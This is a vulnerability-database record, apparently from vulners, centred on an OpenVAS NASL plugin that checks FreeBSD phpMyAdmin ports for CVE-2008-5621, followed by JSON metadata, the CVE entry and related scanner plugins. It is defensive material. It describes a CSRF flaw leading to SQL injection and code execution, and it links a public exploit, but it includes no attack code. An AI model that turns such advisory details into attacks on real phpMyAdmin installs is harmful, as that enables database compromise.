ID OPENVAS:62970 Type openvas Reporter Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com Modified 2016-09-27T00:00:00
Description
The remote host is missing an update to the system
as announced in the referenced advisory.
#
#VID 54f72962-c7ba-11dd-a721-0030843d3802
# OpenVAS Vulnerability Test
# $
# Description: Auto generated from VID 54f72962-c7ba-11dd-a721-0030843d3802
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisories, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
include("revisions-lib.inc");
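# Report text attached to the plugin metadata in the description block.
# "insight" lists the affected FreeBSD ports together with the version bounds
# that the portver()/revcomp() comparisons later in this script enforce.
tag_insight = "The following packages are affected:
phpMyAdmin211 (versions before 2.11.9.4)
phpMyAdmin (versions before 3.1.1)";
# "solution" names the fixed releases first so the finding is actionable
# without following a link; the advisory URLs are kept, labelled as references.
tag_solution = "Update phpMyAdmin211 to version 2.11.9.4 or later, or
phpMyAdmin to version 3.1.1 or later.
References:
http://www.phpmyadmin.net/home_page/security/PMASA-2008-10.php
http://www.milw0rm.com/exploits/7382
http://secunia.com/advisories/33076/
http://www.vuxml.org/freebsd/54f72962-c7ba-11dd-a721-0030843d3802.html";
# "summary" now identifies the product and the CVE this plugin registers via
# script_cve_id(), instead of the generic "update to the system" wording.
tag_summary = "The remote host is missing an update to phpMyAdmin
(CVE-2008-5621) as announced in the referenced advisory.";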
# Metadata pass: runs only when `description` is set, registers the plugin
# attributes below and exits before any of the check code is reached.
if(description)
{
  # Identity and provenance of the plugin.
  script_id(62970);
  script_version("$Revision: 4148 $");
  # NOTE(review): the name mentions only phpMyAdmin211, but the check code
  # also tests the phpMyAdmin port.
  script_name("FreeBSD Ports: phpMyAdmin211");
  script_copyright("Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com");
  script_tag(name:"creation_date", value:"2008-12-23 18:28:16 +0100 (Tue, 23 Dec 2008)");
  script_tag(name:"last_modification", value:"$Date: 2016-09-27 07:32:19 +0200 (Tue, 27 Sep 2016) $");

  # Vulnerability reference and its CVSS v2 base score and vector.
  script_cve_id("CVE-2008-5621");
  script_tag(name:"cvss_base", value:"6.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:S/C:P/I:P/A:P");

  # Classification. qod_type "package" presumably marks the result as derived
  # from the installed package version rather than from probing the
  # application - confirm against the scanner documentation.
  script_category(ACT_GATHER_INFO);
  script_family("FreeBSD Local Security Checks");
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");

  # Prerequisites: the package-list gatherer must have run, and both keys must
  # be present (by their names: FreeBSD release detected, SSH login succeeded).
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/freebsdrel", "login/SSH/success");

  # Report text, taken from the tag_* strings assigned above this block.
  script_tag(name:"insight", value:tag_insight);
  script_tag(name:"solution", value:tag_solution);
  script_tag(name:"summary", value:tag_summary);

  exit(0);
}
#
# The script code starts here
#
include("pkg-lib-bsd.inc");
# Version check: compares each installed phpMyAdmin port against its fixed
# release and reports every port that is older.
# portver() and revcomp() are not defined in this file (pkg-lib-bsd.inc and
# revisions-lib.inc are the includes); the code relies on portver() yielding
# NULL when the port is absent and on revcomp() being negative when `a` is
# older than `b`.

# One line is appended per vulnerable port; an empty string means no finding.
findings = "";

# phpMyAdmin211 port: vulnerable below 2.11.9.4.
installed = portver(pkg:"phpMyAdmin211");
if(!isnull(installed)) {
  if(revcomp(a:installed, b:"2.11.9.4") < 0) {
    findings = findings + 'Package phpMyAdmin211 version ' + installed + ' is installed which is known to be vulnerable.\n';
  }
}

# phpMyAdmin port: vulnerable below 3.1.1.
installed = portver(pkg:"phpMyAdmin");
if(!isnull(installed)) {
  if(revcomp(a:installed, b:"3.1.1") < 0) {
    findings = findings + 'Package phpMyAdmin version ' + installed + ' is installed which is known to be vulnerable.\n';
  }
}

if(findings != "") {
  security_message(data:string(findings));
} else if (__pkg_match) {
  # __pkg_match is not assigned in this file; presumably the package library
  # sets it when a queried port was found, so exit code 99 marks "installed
  # but not vulnerable" - confirm in pkg-lib-bsd.inc.
  exit(99); # Not vulnerable.
}
{"id": "OPENVAS:62970", "type": "openvas", "bulletinFamily": "scanner", "title": "FreeBSD Ports: phpMyAdmin211", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "published": "2008-12-23T00:00:00", "modified": "2016-09-27T00:00:00", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=62970", "reporter": "Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com", "references": [], "cvelist": ["CVE-2008-5621"], "lastseen": "2017-07-02T21:10:21", "viewCount": 2, "enchantments": {"score": {"value": 6.0, "vector": "NONE", "modified": "2017-07-02T21:10:21", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5621"]}, {"type": "freebsd", "idList": ["54F72962-C7BA-11DD-A721-0030843D3802"]}, {"type": "nessus", "idList": ["FEDORA_2008-11221.NASL", "FREEBSD_PKG_54F72962C7BA11DDA7210030843D3802.NASL", "DEBIAN_DSA-1723.NASL", "GENTOO_GLSA-200903-32.NASL", "SUSE_11_0_PHPMYADMIN-090119.NASL", "SUSE_PHPMYADMIN-5935.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310800210", "OPENVAS:63304", "OPENVAS:63257", "OPENVAS:63616", "OPENVAS:136141256231063257", "OPENVAS:136141256231063616", "OPENVAS:136141256231063304", "OPENVAS:136141256231063450", "OPENVAS:63450"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1723-1:67D35"]}, {"type": "exploitdb", "idList": ["EDB-ID:7382"]}, {"type": "phpmyadmin", "idList": ["PHPMYADMIN:PMASA-2008-10"]}, {"type": "gentoo", "idList": ["GLSA-200903-32"]}], "modified": "2017-07-02T21:10:21", "rev": 2}, "vulnersScore": 6.0}, "pluginID": "62970", "sourceData": "#\n#VID 54f72962-c7ba-11dd-a721-0030843d3802\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 54f72962-c7ba-11dd-a721-0030843d3802\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n phpMyAdmin211\n phpMyAdmin\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2008-10.php\nhttp://www.milw0rm.com/exploits/7382\nhttp://secunia.com/advisories/33076/\nhttp://www.vuxml.org/freebsd/54f72962-c7ba-11dd-a721-0030843d3802.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(62970);\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_version(\"$Revision: 4148 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-27 07:32:19 +0200 (Tue, 27 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-12-23 18:28:16 +0100 (Tue, 23 Dec 2008)\");\n script_cve_id(\"CVE-2008-5621\");\n script_name(\"FreeBSD Ports: phpMyAdmin211\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"phpMyAdmin211\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.11.9.4\")<0) {\n txt += 'Package phpMyAdmin211 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"phpMyAdmin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.1.1\")<0) {\n txt += 'Package phpMyAdmin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "FreeBSD Local Security Checks"}
{"cve": [{"lastseen": "2020-10-03T11:51:04", "description": "Cross-site request forgery (CSRF) vulnerability in phpMyAdmin 2.11.x before 2.11.9.4 and 3.x before 3.1.1.0 allows remote attackers to perform unauthorized actions as the administrator via a link or IMG tag to tbl_structure.php with a modified table parameter. NOTE: other unspecified pages are also reachable, but they have the same root cause. NOTE: this can be leveraged to conduct SQL injection attacks and execute arbitrary code.", "edition": 3, "cvss3": {}, "published": "2008-12-17T02:30:00", "title": "CVE-2008-5621", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5621"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:2.11.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.8", "cpe:/a:phpmyadmin:phpmyadmin:2.11.2", "cpe:/a:phpmyadmin:phpmyadmin:2.11.6.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.1.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.1.2", "cpe:/a:phpmyadmin:phpmyadmin:3.0.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.7", "cpe:/a:phpmyadmin:phpmyadmin:2.11.7.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.2.2", "cpe:/a:phpmyadmin:phpmyadmin:2.11.4.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.5.2", "cpe:/a:phpmyadmin:phpmyadmin:3.1.0.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.2", "cpe:/a:phpmyadmin:phpmyadmin:2.11.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.5.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.1.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.3", "cpe:/a:phpmyadmin:phpmyadmin:3.0.0", 
"cpe:/a:phpmyadmin:phpmyadmin:2.11.2.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.0.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.3.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.2.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.5.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.3"], "id": "CVE-2008-5621", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5621", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:40:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5621"], "description": "This host is running phpMyAdmin and is prone to multiple\n CSRF Injection vulnerability.", "modified": "2019-03-06T00:00:00", "published": "2008-12-23T00:00:00", "id": "OPENVAS:1361412562310800210", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800210", "type": "openvas", "title": "phpMyAdmin Multiple CSRF SQL Injection Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_mult_xsrf_vuln.nasl 14010 2019-03-06 08:24:33Z cfischer $\n#\n# phpMyAdmin Multiple CSRF SQL Injection Vulnerabilities\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2008 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800210\");\n script_version(\"$Revision: 14010 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-06 09:24:33 +0100 (Wed, 06 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2008-12-23 15:23:02 +0100 (Tue, 23 Dec 2008)\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2008-5621\");\n script_bugtraq_id(32720);\n script_name(\"phpMyAdmin Multiple CSRF SQL Injection Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2008 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/7382\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2008-10.php\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/fedora-package-announce/2008-December/msg00784.html\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker execute arbitrary codes in the\n context of the application and can compromise database, modify the data or can compromise the whole web application.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin, phpMyAdmin version 2.11 to 2.11.9.3 and 3.0 to 3.1.0.9.\");\n\n script_tag(name:\"insight\", value:\"This flaw is 
due to failure in sanitizing user-supplied data before being\n used in the SQL queries via a link or IMG tag to tbl_structure.php with a modified table parameter.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 2.11.9.4 or 3.1.1.0 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is running phpMyAdmin and is prone to multiple\n CSRF Injection vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! vers = get_app_version( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( version_in_range( version:vers, test_version:\"2.11\", test_version2:\"2.11.9.3\" ) ||\n version_in_range( version:vers, test_version:\"3.0\", test_version2:\"3.1.0.9\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"2.11.9.4/3.1.1.0\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:56:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5622", "CVE-2008-4775", "CVE-2008-5621"], "description": "The remote host is missing an update to phpMyAdmin\nannounced via advisory MDVSA-2009:026.", "modified": "2017-07-07T00:00:00", "published": "2009-01-26T00:00:00", "id": "OPENVAS:63257", "href": "http://plugins.openvas.org/nasl.php?oid=63257", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:026 (phpMyAdmin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_026.nasl 6587 2017-07-07 06:35:35Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:026 (phpMyAdmin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Cross-site scripting (XSS) vulnerability in pmd_pdf.php allows\nremote attackers to inject arbitrary web script or HTML by\nusing db script parameter when register_global php parameter is\nenabled\u00a0(CVE-2008-4775).\n\nCross-site request forgery (CSRF) vulnerability in tbl_structure.php\nallows remote attackers perform SQL injection and execute arbitrary\ncode by using table script parameter (CVE-2008-5621).\n\nMultiple cross-site request forgery (CSRF) vulnerabilities in allows\nremote attackers perform SQL injection by using unknown vectors\nrelated to table script parameter (CVE-2008-5622).\n\nThis update provide the fix for these security issues.\n\nAffected: Corporate 4.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. 
The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:026\";\ntag_summary = \"The remote host is missing an update to phpMyAdmin\nannounced via advisory MDVSA-2009:026.\";\n\n \n\nif(description)\n{\n script_id(63257);\n script_version(\"$Revision: 6587 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 08:35:35 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-26 18:18:20 +0100 (Mon, 26 Jan 2009)\");\n script_cve_id(\"CVE-2008-4775\", \"CVE-2008-5621\", \"CVE-2008-5622\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:026 (phpMyAdmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~2.11.9.4~0.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:38:36", "bulletinFamily": "scanner", 
"cvelist": ["CVE-2008-5622", "CVE-2008-4775", "CVE-2008-5621"], "description": "The remote host is missing an update to phpMyAdmin\nannounced via advisory MDVSA-2009:026-1.", "modified": "2018-04-06T00:00:00", "published": "2009-03-02T00:00:00", "id": "OPENVAS:136141256231063450", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063450", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:026-1 (phpMyAdmin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_026_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:026-1 (phpMyAdmin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Cross-site scripting (XSS) vulnerability in pmd_pdf.php allows\nremote attackers to inject arbitrary web script or HTML by\nusing db script parameter when register_global php parameter is\nenabled\u00a0(CVE-2008-4775).\n\nCross-site request forgery (CSRF) vulnerability in tbl_structure.php\nallows remote attackers perform SQL injection and execute arbitrary\ncode by using table script parameter (CVE-2008-5621).\n\nMultiple cross-site request forgery (CSRF) vulnerabilities in allows\nremote attackers perform SQL injection by using unknown vectors\nrelated to table script parameter (CVE-2008-5622).\n\nThis update provide the fix for these security issues.\n\nUpdate:\n\nThe previous update packages wasn't signed, this time they are.\n\nAffected: Corporate 4.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. 
The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:026-1\";\ntag_summary = \"The remote host is missing an update to phpMyAdmin\nannounced via advisory MDVSA-2009:026-1.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63450\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-02 19:11:09 +0100 (Mon, 02 Mar 2009)\");\n script_cve_id(\"CVE-2008-4775\", \"CVE-2008-5621\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:026-1 (phpMyAdmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~2.11.9.4~0.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:19", "bulletinFamily": 
"scanner", "cvelist": ["CVE-2008-5622", "CVE-2008-4775", "CVE-2008-5621"], "description": "The remote host is missing an update to phpMyAdmin\nannounced via advisory MDVSA-2009:026.", "modified": "2018-04-06T00:00:00", "published": "2009-01-26T00:00:00", "id": "OPENVAS:136141256231063257", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063257", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:026 (phpMyAdmin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_026.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:026 (phpMyAdmin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
